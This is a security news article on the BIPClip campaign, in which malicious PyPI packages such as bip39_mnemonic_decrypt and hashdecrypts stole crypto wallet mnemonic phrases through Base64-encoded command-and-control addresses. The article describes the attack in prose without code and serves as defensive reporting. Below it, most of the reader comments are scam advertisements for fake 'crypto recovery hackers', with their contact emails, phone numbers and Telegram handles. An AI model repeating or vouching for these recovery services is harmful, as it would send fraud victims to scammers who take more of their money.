Bitcoin cryptocurrency

Malicious Python Packages Target Crypto Wallet Recovery Passwords

A newly discovered campaign pushing malicious open source software packages is designed to steal mnemonic phrases used to recover lost or destroyed crypto wallets, according to a report by ReversingLabs. *

The campaign, dubbed BIPClip was uncovered in early March and targets developers working on crypto-related projects. In all, seven different open source packages were identified with links to the campaign, encompassing 19 different file versions. The malicious packages in question target developers who are implementing the Bitcoin Improvement Proposal 39, or BIP39, a list easy-to-remember words that are used to generate a binary seed used to creates deterministic BitCoin wallets, according to a blog post by ReversingLabs researcher Karlo Zanki.

Malicious Open Source Dependencies At Work

The campaign first came to light after one of the packages, bip39_mnemonic_decrypt, turned up in a scan of the Python Package Index (PyPI) using ReversingLabs Spectra Assure software supply chain security platform. The package contained a number of suspicious characteristics including features that performed Base64 decoding as well as a common open source library, requests, that is used for network communication within the Python ecosystem.

Further investigation revealed that the bip39_mnemonic_decrypt was a dependency of a second package, mnemonic_to_address, which could be used to create a seed from the user’s secret mnemonic seed phrase and was free of malicious functionality. Both packages were published in early February by james_pycode, a throwaway PyPI maintainer account that was created on the same day as the packages were published.

The james_pycode maintainer account was created on the same day (February 4) as the malicious Python packages were posted.

At the heart of the campaign is a malicious function, decrypt_jsBIP39, which was found in the bip39_mnemonic_decrypt package at the very end of the file. The decrypt_jsBIP39 function is listed after several, non-malicious functions that are not actually used in the code base, an apparent effort to throw off developers or security teams hunting for red flags in the open source library.  
When run, the function decodes the Base64 encoded URL of the data exfiltration server and invokes another function named cli_keccak256, a malicious function the name of which invokes keccak256, a legitimate cryptographic hash function commonly used to compute the hashes of Ethereum addresses, transaction IDs, and other important values in the Ethereum ecosystem.

The decrypt_jsBIP39 function enables exfiltration of the BIP39 mnemonic phrases. (Image courtesy of ReversingLabs)

More Packages, More Malicious Dependencies

More digging by Zanki and ReversingLabs turned up another malicious Python file pair with nearly identical code: public-address-generator and erc20-scanner, which were also published from a throwaway PyPI account on March 1st. This second file pair appear to work together in the same way as the mnemonic_to_address and bip39_mnemonic_decrypt pair, with malicious functionality identical to that found in the bip39_mnemonic_decrypt package is implemented in the erc20-scanner package. The second set of packages also use the same command and control (C2) server to exfiltrate stolen mnemonics as the first pair, reinforcing their connection.

Hashdecrypt(s): evidence of an older campaign

Finally, Zanki and ReversingLabs uncovered another malicious package, hashdecrypts, that uses slightly different methods to exfiltrate mnemonic phrases than the other packages connected to the BIPClip campaign, and suggests a much longer running campaign targeting mnemonic recovery phrases. 

The newly discovered malicious Python package, hashdecrypts, was published on March 1st by a PyPI user account, luislindao. Unlike the other packages, however, this wasn’t a new, throwaway account. Luislindao was first registered on PyPI in August 2019.  However, the code contained in hashdecrypts was almost identical to the malicious code found in the bip39_mnemonic_decrypt and erc20-scanner packages, suggesting a connection to the BIPClip campaign. 

When run, hashdecrypts places an HTTP GET request to a Base64 encoded URL from which it retrieves the address of the C2 server. The package then sends data to that address using a HTTP POST request. Inside the hashdecrypts code there is a comment header pointing to a github repository belonging to the HashSnake Github user account. When Zanki looked at the commit history for the linked HashSnake Github repository he found a related file, hashdecrypt (note: no trailing “s”), that was first published on December 4, 2022. All three published versions of that package contained the same malicious functionality and fetched the same command and control (C2) server address from the same GitHub repository. 

Uptake of the newly posted malicious PyPI packages was small – with 997 downloads of the public-address-generator package, 341 of the erc20-scanner package, and 224 of the hashdecrypts package. That suggests the campaign had a limited reach.

That’s not so true of the older hashdecrypt package, where ReversingLabs reported 4,295 downloads dating back to December, 2022.

Crypto in the crosshairs (again)

The BIPClip campaign underscores the continued targeting of cryptocurrency related applications and code by malicious actors, according to ReversingLabs. Both cyber criminal and nation state hacking groups have taken an interest in exploiting cryptocurrency software and infrastructure, with the goal of stealing the content of cryptocurrency wallets.

Recent campaigns include the compromise of the open source Ledger Connect Kit, resulting in the redirection of crypto transactions; to publication of malicious npm packages related to cryptocurrency applications and platforms. Nation state actors affiliated with the Democratic Republic of North Korea (DPRK), for example, are believed to have stolen as much as $3 billion in cryptocurrency in the past five years. Stolen cryptocurrency now accounts for as much as 5% of North Korea’s GDP.

That context puts additional burden on developers working on crypto-related projects to assess the security of the open source and commercial code used in their development pipeline, and to assess the security of software artifacts both before, during and after the development and build process, ReversingLabs said.

(*) Editor’s note: In addition to my work as Editor in Chief at The Security Ledger, I am a salaried employee at ReversingLabs where I have served as the Cyber Content Lead since November 2021.


  1. Pingback: Malicious Python Packages Target Crypto Wallet Recovery Passwords - F1TYM1

  2. Pingback: March 15 | cybersecurity update

  3. it’s possible to recover stolen bitcoin or romantic dating funds by DragonWebRecovery

    If you have been the victim of Crypto theft, it’s important to report it to DragonWebRecovery. I am writing this testimony to share my incredible experience of recovering my lost cryptocurrency with the assistance of a skilled DragonWebRecovery. I had invested a significant amount of money in cryptocurrency, believing in its potential for growth and financial security. However, due to a technical issue with my wallet or a security breach that I was unaware of, I suddenly found myself unable to access my funds. Panic and despair set in as I realized the gravity of the situation. In my search for a solution, I came across DragonWebRecovery reputable and trusted hacker known for their expertise in cybersecurity and digital forensics. With nothing to lose and everything to gain, I decided to reach out to them for help. DragonWebRecovery responded promptly and professionally! After a series of carefully executed procedures and security measures, [ DragonWebRecovery ] successfully recovered my cryptocurrency and restored all my bitcoins to my wallet.
    If you ever find yourself in a similar situation, I wholeheartedly recommend reaching out to DragonWebRecovery for assistance. Their expertise and commitment to helping others are truly commendable, and I am living proof of the positive impact they can have on someone’s life. Via Email –

  4. Losing $294,000 worth of bitcoin to a romance scam is devastating. It’s a stark reminder of the risks lurking in the digital world. However, it’s heartening to hear that you found assistance from Mighty Hacker Recovery. Their swift action and expertise in recovering your stolen funds demonstrate the value of having reliable support in such situations. Your story underscores the importance of vigilance online and seeking trusted professionals when faced with cybercrime. If anyone else finds themselves in similar distress, it’s reassuring to know there are reputable resources like Mighty Hacker Recovery available to help.

    www . mightyhackerrecovery . com
    support (at) mightyhackerrecovery . com
    Whats App + 1 ( 4 2 5 ) – 2 0 9 – 5 7 6 1

  5. ɪꜰ ʏᴏᴜ’ᴠᴇ ʙᴇᴇɴ ꜱᴄᴀᴍᴍᴇᴅ ɪ ꜱᴜɢɢᴇꜱᴛ ʏᴏᴜ ꜱʜᴏᴜʟᴅ ꜰɪʀꜱᴛ ɢᴀᴛʜᴇʀ ᴀʟʟ ᴛʜᴇ ᴇᴠɪᴅᴇɴᴄᴇ ᴀɴᴅ ᴄᴏɴᴛᴀᴄᴛ ᴀ ʀᴇᴄᴏᴠᴇʀʏ ꜱᴘᴇᴄɪᴀʟɪꜱᴛ. ɪɴ ᴍʏ ᴄᴀꜱᴇ, ᴛʜᴇ ᴘʀᴏᴄᴇꜱꜱ ᴛᴏᴏᴋ 24 ʜᴏᴜʀꜱ . ɪ ᴡᴀꜱ ᴀʙʟᴇ ᴛᴏ ɢᴇᴛ ʙᴀᴄᴋ ᴀ ꜱᴜʙꜱᴛᴀɴᴛɪᴀʟ ᴀᴍᴏᴜɴᴛ ᴏꜰ ᴛʜᴇ ᴍᴏɴᴇʏ ʟᴏꜱᴛ, ᴍᴀʏ ɪ ꜱᴜɢɢᴇꜱᴛ ꜱᴄᴀᴍ ʀᴇᴄᴏᴠᴇʀʏ ꜱɪᴛᴇ. ᴛʜᴇʏ ʜᴇʟᴘᴇᴅ ᴍᴇ ʀᴇᴄᴏᴠᴇʀ ᴍʏ ꜰᴜɴᴅꜱ ᴡɪᴛʜ ɢᴏᴏᴅ ᴄᴏᴜɴꜱᴇʟʟɪɴɢ ᴀɴᴅ ꜰɪɴᴀɴᴄɪᴀʟ ꜱᴜᴘᴘᴏʀᴛ ꜱʏꜱᴛᴇᴍ ᴛʜᴀᴛ ᴄᴀɴ ʜᴇʟᴘ ʏᴏᴜ ᴀᴛ ᴛʜɪꜱ ᴅɪꜰꜰɪᴄᴜʟᴛ ᴛɪᴍᴇ. ɪꜰ ʏᴏᴜ ʜᴀᴠᴇ ʙᴇᴇɴ ᴀ ᴠɪᴄᴛɪᴍ ᴛᴏ ɪɴᴛᴇʀɴᴇᴛ ʀᴇʟᴀᴛᴇᴅ ꜰʀᴀᴜᴅꜱ ᴅᴏ ɴᴏᴛ ʜᴇꜱɪᴛᴀᴛᴇ ᴛᴏ ʀᴇᴀᴄʜ ᴏᴜᴛ ᴛᴏ
    —ᴛʜᴇʏ’ʀᴇ ʀᴇʟɪᴀʙʟᴇ.

  6. Big thanks to Mrs Evelyn Rayn one of the best BINARY OPTION, FOREX AND BITCOIN manager who has the best strategy and signals that can help you win every time you trade .. before meeting her I was scammed several times and I lost $20000 to 2 different managers who claims they are real but turn into monsters the moment I fund my trading account … but today I’m so grateful to Mrs Evelyn Rayn for coming to my rescue .. I posted this to those who are already given on binary and Forex options and to the newbies take advice and be saved.. if you contact her tell her I referred you to her so that I will have my referring bonus….you can contact her via email: or WhatsApp +1 (945) 7130 792

  7. jennifer bryner


    MY CRYPTO RECOVERY EXPERIENCE 2024 WARNING: Scammers will stop at nothing to steal your hard-earned money! But, I’m living proof that JETWEBHACKERS can help you RECLAIM YOUR LOST FUNDS! I thought I’d lost my life savings of $58,000 after investing with a fake broker, promising me a whopping $187,000 profit to fund my urgent surgery. But, JETWEBHACKERS didn’t give up on me. They worked tirelessly to track down my money and recover it. And, after months of intense effort, they successfully recovered my entire investment – $58,000! I’m now able to focus on my health and recovery, knowing that I’ve been given a second chance thanks to JETWEBHACKERS. Don’t let scammers ruin your life like they almost did mine! If you’re in a similar situation, don’t hesitate to reach out to JETWEBHACKERS. They’ll be your champion in the fight against online fraud!” CONTACT THEM VIA EMAIL:jetwebhackers @ gmail .com TELEGRAM: @jetwebhackers

  8. Hello everyone I want to use this Medium to say big thank you to Fast Web Recovery Hackers for they helped me recover my stolen crypto worth $420,000 through their hacking skills I tried it I was skeptic but it worked and I got my money back, I’m so glad I came across them early because I thought I was never going to get my money back from those fake online investment websites .. you can also contact them via

  9. Hello everyone I want to use this Medium to say big thank you to Fast Web Recovery Hackers for they helped me recover my stolen crypto worth $40,000 through their hacking skills I tried it I was skeptic but it worked and I got my money back, I’m so glad I came across them early because I thought I was never going to get my money back from those fake online investment websites .. you can also contact them via

  10. who have ever been a victim of a scam? Lost your wallet or money to fake hackers online? I’ll implore you to contact this trustworthy hacker and recovery expert spycjoness. I was a victim of fake people posing as binary options and bitcoin investors, I lost a sum of $5,000 and 2BTC from my bitcoin wallet to these fakes. It took a while before I realized they were scams and this really hurt .Then an in-law of mine heard about it and recommended to me a specialist with the address . He helped me recover my lost bitcoins in less than 72hrs and the fakes were caught and made to pay for what they did to me .if you have lost any amount to online scams and you’re seeking to recover them, in fake hackers, online dating scams, btc wallet hack, fake binary investors .Reach out to (Lisatheo225 gmail com) to help you ,and you will be so glad you did so, Absolutely fantasic review

  11. I found myself at a crossroads when what I thought was a secure investment in cryptocurrency turned out to be a devastating scam, jeopardizing my savings accumulated painstakingly over two decades. It was a harsh awakening to the perils lurking in the digital investment landscape, where promises of lucrative returns can often mask deceitful schemes designed to prey on the unsuspecting.After realizing the extent of my losses, I embarked on a desperate quest for solutions. I scoured the internet tirelessly, sought advice from financial professionals, and was met with the grim consensus that my savings were irretrievably gone. Just as despair threatened to overwhelm me, a ray of hope emerged from an unexpected source—a Reddit post discussing lost crypto recovery.Intrigued and cautious, I reached out to Daniel meuli Web Recovery, spurred by their reputation as leaders in the field of reclaiming stolen cryptocurrencies. The decision to trust them with my case turned out to be the best I had made in a long while. From the outset, Daniel meuli Web Recovery demonstrated unparalleled professionalism and empathy, patiently listening to my story and offering reassurance amid my distress.Their approach was nothing short of meticulous. They embarked on a comprehensive investigation, leveraging advanced techniques and forensic expertise to trace the intricate paths of my lost coins. Throughout the process, they maintained transparent communication, keeping me informed of their progress and guiding me through each step with clarity and understanding.The pivotal moment arrived when Daniel meuli Web Recovery delivered the news that seemed too good to be true—they had successfully recovered a substantial portion of my investments. The relief and gratitude I felt were overwhelming. Daniel meuli Web Recovery not only restored my financial security but also renewed my faith in the possibility of reclaiming what was rightfully mine.Daniel meuli Web Recovery serves as a potent reminder of the importance of due diligence and vigilance in navigating the complexities of digital investments. While the allure of cryptocurrency may be enticing, it is essential to verify the legitimacy of platforms and conduct thorough background checks before committing funds.To anyone who suspects they have fallen victim to financial deception, I wholeheartedly recommend acting swiftly and reaching out to Daniel meuli Web Recovery. Their expertise and unwavering dedication to client welfare set them apart as a beacon of hope in the fight against fraud. They epitomize integrity and excellence, consistently delivering superlative recovery services that exceed expectations.Daniel meuli Web Recovery has not only restored my financial stability but also empowered me to share my story as a cautionary tale. Trust in their capabilities and take the decisive step toward reclaiming your financial security and peace of mind. Your journey toward recovery begins with Daniel meuli Web Recovery—get connected today and safeguard your future against financial deceit.  
    Website. https : // daniel meuli recovery wizard . online   Email. hireus @ daniel meuli recovery wizard . online  WhatsApp. +.

  12. I almost lost my life after falling victim to a scam that went on for weeks, I got contacted by a lady pretending to be a Forex trader account manager, told me I’ll make huge profits if I invest on her platform not knowing that I was being targeted, I started making investments through bitcoins until it was time to withdraw and they insisted I had to pay 20% to withdraw my money and it was then I knew I was being swindled. Unfortunately, I had already put $90,000 into this investment scam. While I was wallowing in depression, I came across an article about a company CYBERPOINT Recovery that can help me recover my money, I didn’t hesitate to contact them, they took some information from me and to my surprise, all my money was recovered within 48 hours. I’m truly grateful to CYBERPOINT Recovery for their professionalism in helping me recover my money. If you have lost money to any of these scams, I’ll recommend them to you. Their contact:(Support @ cyberpointrecovery . com)

  13. What you need is the best recovery expert. Fast Web Recovery Hacker can help you get out from under your crypto theft methods. The bitcoin investing industry is full of scammers, and despite people’s best efforts to make enormous gains, they regularly end up losing money. No one can defeat these people’s cunning schemes because of their intelligence. They typically offer contact agreements and put you in a group with others who have already made investments to tempt you to invest your hard-earned money. I invested my money as advised, then a few days later I discovered that ID Mining had taken it. I appreciate Fast Web Recovery Hacker assistance in helping me reclaim my BTC from these cyber crooks. I firmly guarantee that using Fast Web Recovery Hacker to retrieve your stolen BTC back will be safe. Talk with a representative today on:

  14. After enduring months of stress and confusion due to losing Bitcoin, discovering SYLVESTER G.BRYANT and his team marked a significant turning point for me. SYLVESTER G.BRYANT is renowned for effectively recovering lost cryptocurrencies. They promptly and efficiently handled my case, providing regular updates and progress reports that instilled confidence in me. Thanks to their commitment and professionalism, I successfully retrieved my lost Bitcoin, putting an end to the uncertainty I had been facing. I am incredibly thankful for their assistance and encourage others in similar predicaments to seek help as well. For assistance, reach out to SYLVESTER BRYANT at YT7CRACKER@GMAIL.COM.

  15. In an era rife with digital scams and financial malfeasance, locating reliable assistance can resemble an arduous quest through a labyrinth of deception. My voyage with Pro Wizard Gilbert Recovery emerged as a guiding light amid the tumult, reigniting my belief in the prospect of recouping what was rightfully mine.Let’s rewind to a time of uncertainty and frustration. Like many others, I found myself entangled in the web of deceit spun by scammers, holding my digital assets hostage behind exorbitant fees and false promises. The despair of feeling powerless in the face of such injustice was suffocating. However, amidst the cacophony of doubt, a glimmer of hope emerged in the form of Pro Wizard Gilbert Recovery.Having heard whispers of their expertise during my tenure at Fiverr,where a colleague had successfully enlisted their help, I decided to take the leap and reach out. From the very first interaction, their professionalism and dedication shone through, offering a lifeline in my darkest hour.Navigating the digital asset recovery is no easy feat, but Pro Wizard Gilbert Recovery proved themselves to be true wizards in the field. With a team of highly skilled experts at the helm, they embarked on a mission to right the wrongs inflicted upon me by fraudulent actors.Communication was key throughout the process, with regular updates providing much-needed reassurance and transparency. Their unwavering commitment to my case was evident at every turn, instilling a sense of trust and confidence that had been sorely lacking in my previous endeavors.Despite the hurdles we faced, including the shutdown of the fraud company’s website, Pro Wizard Gilbert Recovery’s perseverance never wavered. Their meticulous approach and tireless efforts culminated in a triumphant victory, with my lost funds being fully recovered in a mere three days. My life was illuminated once more thanks to the expertise and dedication of Pro Wizard Gilbert Recovery. Their ability to turn the tide against fraudsters and restore justice to those who have been wronged is nothing short of extraordinary. Pro Wizard Gilbert Recovery transcended mere satisfaction; it was a testament to the power of integrity, competence, and genuine care in an industry fraught with deception. They are more than just a service provider; they are beacons of hope for anyone who has fallen victim to financial scams.As I end, wholeheartedly endorse
    Pro Wizard Gilbert Recovery to anyone in need of assistance in reclaiming their stolen assets. Trusting them with my case was a decision I will never regret, and I am eternally grateful for the light they brought into my life during my bad time.Pro Wizard Gilbert Recovery by your side, there is no obstacle too great to overcome, and no injustice too insurmountable to rectify. Email: prowizardgilbertrecovery(@)engineer .com
    Telegram: @Pro_Wizard_Gilbert_Recovery
    WhatsApp ; +1 (516) 347‑9592

  16. Avoiding Cryptocurrency Scams My Experience and Recovery Story
    My husband and I wanted to invest in the stock market to get more out of our savings. I had seen advertisements on my social media and signed up to be polite and reassuring, we paid 250 for them to show us what they could do. I’d like to say that everything seemed very serious (website, personal account, personal advisor,…), so we decided to invest 30,000. I was able to get 5,000 back quickly, and it was only then that things got weird. They suggested investing more and signing a one-year warranty contract (to be able, they said, to make a monthly profit). They were talking about 50,000 to 200,000 to make a real profit! We refused and didn’t feel very comfortable, so we asked for the remaining 25,000 back. I was told I had to pay 10,000 to get the money back (as a fee!) and only then would they give it back. We then contacted the FCA (Financial Control Authority), who confirmed that they weren’t authorized and that we’d been scammed. Avoid these people at all costs, they mean you no good. I was lucky and got my money back with the help of a company i can highly recommend them here is their Telegram: AssetRecoverNet , WhatsApp: +1(504) 302-3464 Emeil: I know other might have fallen a victim of this wicked people too your investment can be retrieve don’t lose hope .